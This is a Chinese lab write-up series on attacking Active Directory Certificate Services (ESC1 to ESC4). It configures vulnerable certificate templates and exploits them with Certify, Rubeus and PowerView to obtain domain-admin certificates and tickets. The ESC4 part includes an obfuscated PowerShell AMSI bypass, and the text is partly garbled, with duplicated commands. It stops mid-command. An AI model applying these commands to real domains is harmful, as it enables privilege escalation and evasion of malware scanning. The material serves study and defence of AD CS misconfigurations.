2024針對(duì)域證書(shū)服務(wù)的攻擊分析

No.No.PAGE1/8針對(duì)域證書(shū)服務(wù)的攻擊分析（1）0x00前言\h關(guān)于域證書(shū)服務(wù)攻擊的白皮書(shū)出來(lái)大半個(gè)月了https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf，下文以白皮書(shū)代指。作者也在BH21中在NTLMrelayadcsHTTP來(lái)獲取域控權(quán)限的ESC8上。其實(shí)白皮書(shū)中關(guān)于攻擊項(xiàng)的技術(shù)有19個(gè)，我計(jì)劃邊學(xué)邊寫(xiě)。這個(gè)過(guò)程中難免出錯(cuò)，望指正。昨天我把域環(huán)境搭建好，同時(shí)也在其中一臺(tái)服務(wù)器上開(kāi)啟了ADCS服務(wù)，打算試試Certify和ForgeCert具。在測(cè)試Certify工具的時(shí)候，看到github的issue時(shí)候就報(bào)錯(cuò)了。我的編譯環(huán)境是：Win102004、VS2019、.NET4，解決比較簡(jiǎn)單，修改Certify.csproj文件中多處：<LangVersion>0.9</LangVersion><LangVersion>0.9</LangVersion>改為<LangVersion>default</LangVersion>然后在非域用戶(hù)登錄的域內(nèi)機(jī)器上執(zhí)行的。這兒暫時(shí)跳過(guò)，我使用域用戶(hù)登錄域內(nèi)機(jī)器，成功執(zhí)行。瞬間就尷尬了，沒(méi)有危害。還沒(méi)開(kāi)始就結(jié)束了。好吧，測(cè)試之前我們先來(lái)配置危害環(huán)境。（ps用“漏洞”一詞的地方我全部以“危害”代替，原因大家都清楚）0x02危害環(huán)境配置我們對(duì)白皮書(shū)中攻擊項(xiàng)的利用進(jìn)行分類(lèi)：竊取類(lèi)個(gè)體權(quán)限維持類(lèi)（類(lèi)似銀票，后文以銀證稱(chēng)呼）權(quán)限提升類(lèi)域權(quán)限維持類(lèi)（類(lèi)似金票，后文以金證稱(chēng)呼）要是測(cè)試ESC1，“DomainescalationviaNoIssuanceRequirementsEnrollableClientAuthentication/SmartCardLogonOIDtemplates+CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT”，這句話表達(dá)了3個(gè)點(diǎn)：我們需要有權(quán)限去獲取證書(shū)能夠登記為客戶(hù)端身份驗(yàn)證或智能卡登錄等CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT開(kāi)啟我們首先創(chuàng)建一個(gè)具有以上3個(gè)點(diǎn)的證書(shū)模板，使用certtmpl.msc板，在常規(guī)中修改模板顯示名稱(chēng)為ESC1，擴(kuò)展中的應(yīng)用程序策略中加入客戶(hù)端身份認(rèn)證。在安全中加入DomainUsers具有注冊(cè)權(quán)限：在使用者名稱(chēng)中，選擇在請(qǐng)求中提供，也就是開(kāi)啟CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT。然后使用Certsrv.msc，發(fā)布我們創(chuàng)建的危害模板然后刷新刷新，稍等下，使用certify，檢測(cè)危害。Certify.exefind/vulnerableCertify.exefind/vulnerable危害出現(xiàn)了。0x03ESC1利用利用就很簡(jiǎn)單了，這兒Certify.exe工具有2個(gè)DLL依賴(lài)，需要復(fù)制到同目錄下，還沒(méi)研究怎么搞成一個(gè)exe，不然使用很麻煩，我們暫時(shí)先復(fù)制DLL依賴(lài)測(cè)試，后面再完善利用工具。成功獲取到證書(shū)，注意altname參數(shù)，這個(gè)需要填的是域管用戶(hù)名。然后算換pem到pfx，這個(gè)需要使用linux或者macos環(huán)境中的opnessl，我windows上裝有WLS，直接開(kāi)個(gè)WLS挺方便的。opensslopensslpkcs12-incert.pem-keyex-CSP"MicrosoftEnhancedCryptographicProviderv1.0"-export-outcert.pfx最后使用Rubeus獲取TGT，我這兒直接就ptt了。這兒需要注意的是要ptt當(dāng)然是需要管理員權(quán)限的。0x04總結(jié)這就是ESC1的錯(cuò)誤配置利用了，本文沒(méi)有涉及到原理，只從配置和攻擊利用上編寫(xiě)，感官上可能會(huì)覺(jué)得這樣的錯(cuò)誤配置在真實(shí)環(huán)境中多么？這個(gè)我也不確定，但據(jù)作者白皮書(shū)描述多，因?yàn)檫@3人為配置，有些是默認(rèn)配置，例如web服務(wù)器模板里面默認(rèn)CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT開(kāi)啟，用戶(hù)模板里面默認(rèn)domianusers有注冊(cè)權(quán)限，我上面演示的模板默認(rèn)在應(yīng)用策略配置中就有客戶(hù)端認(rèn)證配置。因此ESC1這樣情況的錯(cuò)誤配置應(yīng)該挺常見(jiàn)的。原理部分我會(huì)單獨(dú)寫(xiě)，因?yàn)槲夷壳耙彩菍W(xué)習(xí)階段，理解的還不夠深刻，后面再補(bǔ)上原理分析。No.No.PAGE1/4針對(duì)域證書(shū)服務(wù)的攻擊分析（2）-ESC20x00前言在ESC1的分析中我們遇到了一個(gè)問(wèn)題，就是Certify這個(gè)工具帶了2個(gè)DLL，很不方便，剛好今天看twitter看到這么一個(gè)項(xiàng)目，\h/CCob/dnMerge，使用NuGet搜dnMerge中，再release生成，就能編譯成一個(gè)EXE了，很是簡(jiǎn)單。需要注意的就是只有release生成可以用，debug是不能用的。第二件事是一個(gè)題外話，我由于本地網(wǎng)絡(luò)問(wèn)題，我環(huán)境域控修改了IP，導(dǎo)致域中機(jī)器Ping域控域名的時(shí)\h候返回。這是我沒(méi)有按照正規(guī)流程修改域控IP，細(xì)節(jié)看/articles/a7f1f7d57357f9c62042707d09ae5f20.html能亂動(dòng)，一點(diǎn)小改動(dòng)就會(huì)出問(wèn)題。這也是為什么域中很多就是默認(rèn)設(shè)置，管理員不敢亂配置的原因吧?；貧w今天的ESC2，ESC2和ESC1比較相似，大部分前提條件相同，具體條件如下：低權(quán)限用戶(hù)（我們這兒使用普通域用戶(hù)）可以有權(quán)限注冊(cè)證書(shū)管理員審批被關(guān)閉簽名沒(méi)有被要求認(rèn)證低權(quán)限用戶(hù)可以使用危害模板以上都是ESC1的條件，下面一條是和ESC1不同的：證書(shū)模板被設(shè)置成AnyPurposeEKU或者noEKU而在ESC1中開(kāi)啟CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT的要求就不需要了。這種情況下我們能干什么呢？先搭建測(cè)試環(huán)境。0x01危害環(huán)境搭建因?yàn)楹虴SC1的變化很小，因此我們直接復(fù)制ESC1模板，并改名為ESC2，然后修改應(yīng)用程序策略為目的然后把ESC1的使用者名稱(chēng)改回默認(rèn)值。0x02利用測(cè)試我們還是使用ESC1的測(cè)試步驟，這里就不詳細(xì)截圖了（不記得的同學(xué)可以翻看ESC1的測(cè)試）而知：由于我們使用者名稱(chēng)改回了默認(rèn)值，即使在使用certify獲取證書(shū)的時(shí)候使用了altname，并設(shè)定一個(gè)域管理用戶(hù)名。證書(shū)獲取不會(huì)報(bào)錯(cuò)，但是這個(gè)證書(shū)并不能使用這個(gè)域管理登錄，系統(tǒng)沒(méi)有采納altname的值，而是使用當(dāng)前用戶(hù)win101709，如下圖，“用ActiveDirectory中信息生成”無(wú)法登錄域控。0x03總結(jié)所以這個(gè)ESC2，體感上作用太弱了。根據(jù)作者的描述，大致意思是，當(dāng)使用AnyPurpose的時(shí)候，表示攻擊者可以獲取客戶(hù)端認(rèn)證、服務(wù)器認(rèn)證、代碼簽名等等證書(shū)，換句話說(shuō)就是能獲取任何目的的證書(shū)。然后作者就沒(méi)說(shuō)啥了，我想說(shuō)這兒應(yīng)該有個(gè)但是，但是TM的沒(méi)有提權(quán)啊。不是說(shuō)ESC都是提權(quán)么？我win101709的用戶(hù)權(quán)限沒(méi)變啊，雖然由于錯(cuò)誤配置，導(dǎo)致我這兒用戶(hù)可以搞到各種證書(shū)，但是用戶(hù)權(quán)限沒(méi)有變化。從ESC2被作者在06/22/21成ESC2了就留著吧！最后作者補(bǔ)充道，我們可以使用這些證書(shū)干其他的事情比如在SAML,ADFS,orIPSec等網(wǎng)絡(luò)服務(wù)上利用。具體在這些服務(wù)上能夠出現(xiàn)什么利用場(chǎng)景，就需要大家挖掘了，ESC2說(shuō)就是當(dāng)前用戶(hù)擁有了請(qǐng)求各種證書(shū)的能力，具體發(fā)揮場(chǎng)景還需要自己思考。除AnyPurpose以外，另外一個(gè)是noEKUs，就是應(yīng)用程序策略為空。在為空的時(shí)候攻擊可以簽署一個(gè)從屬CA證書(shū)，在這個(gè)從屬CA中，攻擊者可以任意修改EKU和其他屬性，但是這個(gè)從屬CA證書(shū)默認(rèn)是不被信任的（也就是在NTAuthCertificates的cACertificate中沒(méi)有這個(gè)從屬證書(shū)），那么就沒(méi)法登錄域控。最后感覺(jué)和AnyPurpose一樣，就是可以獲取各種證書(shū)的能力?？傮w來(lái)說(shuō)這個(gè)ESC2有點(diǎn)扯淡。不過(guò)后面還有很多內(nèi)容，說(shuō)不定，后面有給出從屬CA的利用場(chǎng)景。我們回顧下ESC2和ESC1的區(qū)別就是使用者名稱(chēng)配置是能夠提權(quán)的關(guān)鍵。No.No.PAGE1/7針對(duì)域證書(shū)服務(wù)的攻擊分析（3）-ESC30x01前言在ESC1的利用的時(shí)候，好多小伙伴遇到一個(gè)錯(cuò)誤，借用@Rcoil同學(xué)的圖。解決方法也在星球，有@Rcoil同學(xué)形成的文檔。遇到這個(gè)錯(cuò)誤的同學(xué)可以去看下。這個(gè)錯(cuò)誤主要是因?yàn)?016以下的系統(tǒng)不支持這個(gè)COM接口，因此需要改下代碼。我開(kāi)始以為是證書(shū)服務(wù)器16以下會(huì)出這個(gè)問(wèn)題，但是我自己搭建12的證書(shū)服務(wù)器環(huán)境發(fā)現(xiàn)并沒(méi)有報(bào)錯(cuò)，因此我懷疑是域控在16以下。這算一個(gè)遺留問(wèn)題，具體這個(gè)請(qǐng)求是發(fā)送到域控還是證書(shū)服務(wù)器，需要后面分析，先mark下。回歸正題，今天時(shí)ESC3的分析，ESC3主要濫用的是錯(cuò)誤配置了證書(shū)申請(qǐng)代理模板（EnrollmentAgentTemplates），方案就出來(lái)了，一個(gè)普通域用戶(hù)代替域管理員去申請(qǐng)證書(shū)。我們具體看下需要怎樣的錯(cuò)誤配置：模板（EnrollmentAgentTemplates）允許一個(gè)低權(quán)限用戶(hù)（這里我們使用普通域用戶(hù)）去注冊(cè)一個(gè)代理證書(shū)。這個(gè)條件和ESC1差不多，不需要設(shè)置使用者名稱(chēng)為在請(qǐng)求中提供，以及在擴(kuò)展序策略的EKU為證書(shū)申請(qǐng)代理OID（.4.1.3）。另外一個(gè)模板允許一個(gè)低權(quán)限用戶(hù)使用代理證書(shū)（enrollmentagentcertificate）去代表另外一個(gè)用戶(hù)請(qǐng)求證書(shū)，并且這個(gè)模板的EKU里配置有允許域認(rèn)證的EKU。這里有點(diǎn)繞啊！不用擔(dān)心，我們老規(guī)矩，配置環(huán)境。0x02危害環(huán)境配置這里涉及到2個(gè)模板，我們先配置第一個(gè)模板，還是在ESC1的基礎(chǔ)上配置，安全中的配置不變還是配置了一個(gè)domainusers組，來(lái)滿(mǎn)足低權(quán)限訪問(wèn)，這里在實(shí)戰(zhàn)中要舉一反三，以我們當(dāng)前權(quán)限為出發(fā)點(diǎn)，如果我們當(dāng)前有一個(gè)其他權(quán)限，而剛好有個(gè)一個(gè)危害模板在這個(gè)權(quán)限下能夠訪問(wèn)，就滿(mǎn)足了這個(gè)條件，而不是非要domainusers的權(quán)限。使用者名稱(chēng)改回默認(rèn)的用ActiveDirectory中的信息生成還是擴(kuò)展中的應(yīng)用程序策略，改為證書(shū)申請(qǐng)代理。第二個(gè)模板我們還是在ESC1上設(shè)置，名稱(chēng)改為ESC3_1，在ESC1的基礎(chǔ)上安全不用改，使用者名稱(chēng)恢復(fù)默認(rèn)的用ActiveDirectory中的信息生成。擴(kuò)展也不用改，保留里面的客戶(hù)端認(rèn)證EKU。下面的修改是和以往不同的。這就是ESC3的2個(gè)模板了。這需要注意的是，你看我一項(xiàng)一項(xiàng)的配置，感覺(jué)修改的很多，大多不是默每個(gè)ESC(權(quán)限提升)的各個(gè)關(guān)鍵配置點(diǎn)，理解里面的各個(gè)配置的作用，在實(shí)戰(zhàn)中才能靈活運(yùn)用。0x03工具利用Certify.exefind/vulnerableCertify.exefind/vulnerable這是第一個(gè)模板，還有第二個(gè)模板，你會(huì)發(fā)現(xiàn)這個(gè)命令并沒(méi)有識(shí)別出ESC3_1的時(shí)候也要注意了，不要只用上面的命令查看是否有危害，工具不是萬(wàn)能的。我們使用：Certify.exefind/ca:"\redteamlab-WIN2019-CA"Certify.exefind/ca:"\redteamlab-WIN2019-CA"這個(gè)命令查看證書(shū)服務(wù)器上可用的所有模板，其中ESC3_1滿(mǎn)足我們利用的第二個(gè)條件:首先我們，利用ESC3模板獲取一個(gè)代理證書(shū)：Certify.exerequest/ca:"\redteamlab-WIN2019-CA-1"Certify.exerequest/ca:"\redteamlab-WIN2019-CA-1"/template:ESC3老規(guī)矩，pem轉(zhuǎn)pfx，這一步我就略去了，還不會(huì)的同學(xué)，看前2面文章。然后再利用ESC3_1模板去獲取特權(quán)證書(shū)，其中onbehalfof參數(shù)一定要使用NETBIOS名，xiaoaiti、redteamlab\xiaoaiti、\xiaoaiti都不行，一定要是REDTEAMLAB\xiaoaiti。具體原因可能是工具限制，這兒搞了我半天。具體原因先mark下，后面分析。Certify.exerequest/ca:"\redteamlab-WIN2019-CA-1"/template:ESC3_1/onbehalfof:REDTEAMLAB\xiaoaiti/enrollcert:3.pfxCertify.exerequest/ca:"\redteamlab-WIN2019-CA-1"/template:ESC3_1/onbehalfof:REDTEAMLAB\xiaoaiti/enrollcert:3.pfx最后一步，再使用pem轉(zhuǎn)pfx，然后使用Rubeus，搞TGT：Rubeus.exeasktgt/user:REDTEAMLAB\xiaoaiti/certificate:4.pfxRubeus.exeasktgt/user:REDTEAMLAB\xiaoaiti/certificate:4.pfx0x04總結(jié)ESC3重點(diǎn)是代理模板的利用，這個(gè)過(guò)程我搞了好久，因?yàn)?，為了?yàn)證前言中的win2012把域證書(shū)鏈弄錯(cuò)了，搞了很久一直報(bào)錯(cuò)，申請(qǐng)到證書(shū)一直報(bào)KDC_ERR_CLIENT_NOT_TRUSTED在了最后一部，后面發(fā)現(xiàn)是我根證書(shū)沒(méi)有部署到域控的問(wèn)題，導(dǎo)致整個(gè)證書(shū)鏈不能被信任。最后手動(dòng)修復(fù)：cdC:\Windows\System32\certsrv\CertEnrollC:\Windows\System32\certsrv\CertEnroll>certutil-dspublish<CNnameofmyca>.crlC:\Windows\System32\certsrv\CertEnroll>cdC:\Windows\System32\certsrv\CertEnrollC:\Windows\System32\certsrv\CertEnroll>certutil-dspublish<CNnameofmyca>.crlC:\Windows\System32\certsrv\CertEnroll>certutil-dspublish<CNnameofmyca>+.crlps:文中證書(shū)服務(wù)器開(kāi)始時(shí)\redteamlab-WIN2019-CA，后面就成了\redteamlab-WIN2019-CA-1，就是因?yàn)槲抑匮b了證書(shū)服務(wù)器。No.No.PAGE2/9針對(duì)域證書(shū)服務(wù)的攻擊分析（4）-ESC40x00前言ESC4叫做“VulnerableCertificateTemplateAccessControl”，其實(shí)是弱ACL寫(xiě)完ESC1-ESC3，ESC4由于白皮書(shū)沒(méi)有比較詳細(xì)的過(guò)程，并且我本地域環(huán)境出了點(diǎn)問(wèn)題，就擱置到現(xiàn)\h在。但是國(guó)慶的時(shí)候，看見(jiàn)國(guó)外的研究員發(fā)布了一篇關(guān)于ESC4的文章：/daem0nc0re/Abusing_Weak_ACL_on_Certificate_Templates的權(quán)限控制策略，ESC4利用的就是這個(gè)權(quán)限控制不嚴(yán)格，例如：domainusers組的用戶(hù)具有寫(xiě)入權(quán)限，這樣它就可以修改模板的配置為可以滿(mǎn)足提權(quán)的配置樣式，比如修改成ESC1們還是先來(lái)搭建測(cè)試環(huán)境。0x01危害環(huán)境搭建我們基于"基本EFS"配置ESC4的危害模板，修改模板名稱(chēng)為ESC4開(kāi)啟CA證書(shū)管理程序批準(zhǔn)開(kāi)啟授權(quán)簽名配置DomainUsers有可寫(xiě)權(quán)限（危害點(diǎn)其他保持默認(rèn)好了配置就這么簡(jiǎn)單，其實(shí)，重要的是domainusers具有寫(xiě)入權(quán)限。其他的配置只是模仿常見(jiàn)情況。然后記得發(fā)布證書(shū)模板。0x02利用我還是使用Certify.exe來(lái)發(fā)現(xiàn)危害：Certify.exefind/vulnerableCertify.exefind/vulnerable我們主要利用的是domainusers具有WriteDacl的權(quán)限，來(lái)修改模板的配置，讓這個(gè)模板滿(mǎn)足ESC1的要求。模板注冊(cè)權(quán)限我們現(xiàn)在只有模板的寫(xiě)入權(quán)限，沒(méi)有模板的注冊(cè)權(quán)限，我們來(lái)給模板加注冊(cè)權(quán)限，我們使用powerview來(lái)操作，直接加載powerview可能會(huì)被AMSI攔截：這個(gè)難不倒我們，讀過(guò)《bypassamsi的前世今生系列》的同學(xué)應(yīng)該秒過(guò)，我們直接用一句話關(guān)閉AMSI：$a="5492868772801748688168747280728187173688878280688776828"$b="1173680867656877679866880867644817687416876797271"$a="5492868772801748688168747280728187173688878280688776828"$b="1173680867656877679866880867644817687416876797271"$c=[string](0..37|%{[char][int](29+($a+$b).substring(($_*2),2))})-replace""$d=[Ref].Assembly.GetType($c)$e=[string](38..51|%{[char][int](29+($a+$b).substring(($_*2),2))})-replace""$f=$d.GetField($e,'NonPublic,Static')$f.SetValue($null,$true)加注冊(cè)權(quán)限：Add-DomainObjectAclAdd-DomainObjectAcl-TargetIdentityESC4-PrincipalIdentity"DomainUsers"-RightsGUID"0e10c968-78fb-11d2-90d4-00c04f79dc55"-TargetSearchBase"LDAP://CN=Configuration,DC=redteamlab,DC=com"-Verbose我們使用Certify.exe來(lái)驗(yàn)證下是否有注冊(cè)權(quán)限：禁用CA證書(shū)管理程序批準(zhǔn)雖然這個(gè)是我們?nèi)斯づ渲瞄_(kāi)啟的，是為了模擬常見(jiàn)情況，我們這會(huì)兒把這個(gè)配置關(guān)閉。同樣使用powerview：Set-DomainObject-SearchBase"CN=CertificateTemplates,CN=PublicKeyServices,CN=Services,CN=Configuration,DC=redteamlab,DC=com"Set-DomainObject-SearchBase"CN=CertificateTemplates,CN=PublicKeyServices,CN=Services,CN=Configuration,DC=redteamlab,DC=com"-IdentityESC4-XOR@{'mspki-enrollment-flag'=2}-Verbose和前文中的圖對(duì)比，選項(xiàng)中已經(jīng)沒(méi)有PEND_ALL_REQUESTS選項(xiàng)了。禁用授權(quán)簽名我們把授權(quán)簽名數(shù)設(shè)置為0，就可以達(dá)到禁用的效果：Set-DomainObject-SearchBase"CN=CertificateTemplates,CN=PublicKeyServices,CN=Services,CN=Configuration,DC=redteamlab,DC=com"Set-DomainObject-SearchBase"CN=CertificateTemplates,CN=PublicKeyServices,CN=Services,CN=Configuration,DC=redteamlab,DC=com"-IdentityESC4-Set@{'mspki-ra-signature'=0}-Verbose啟用在請(qǐng)求中提供使用者名稱(chēng)閱讀過(guò)ESC1-3的小伙伴應(yīng)該知道這個(gè)配置的重要性，配置了這個(gè)配置，我們就可以將任何用戶(hù)名指定為SAN的值。Set-DomainObject-SearchBase"CN=CertificateTemplates,CN=PublicKeyServices,CN=Services,CN=Configuration,DC=redteamlab,DC=com"Set-DomainObject-SearchBase"CN=CertificateTemplates,CN=PublicKeyServices,CN=Services,CN=Configuration,DC=redteamlab,DC=com"-IdentityESC4-XOR@{'mspki-certificate-name-flag'=1}-Verbose更改應(yīng)用策略擴(kuò)展我們給應(yīng)用策略擴(kuò)展加上“客戶(hù)端身份驗(yàn)證”，這樣我們才能使用證書(shū)登錄。Set-DomainObject-SearchBase"CN=Certifica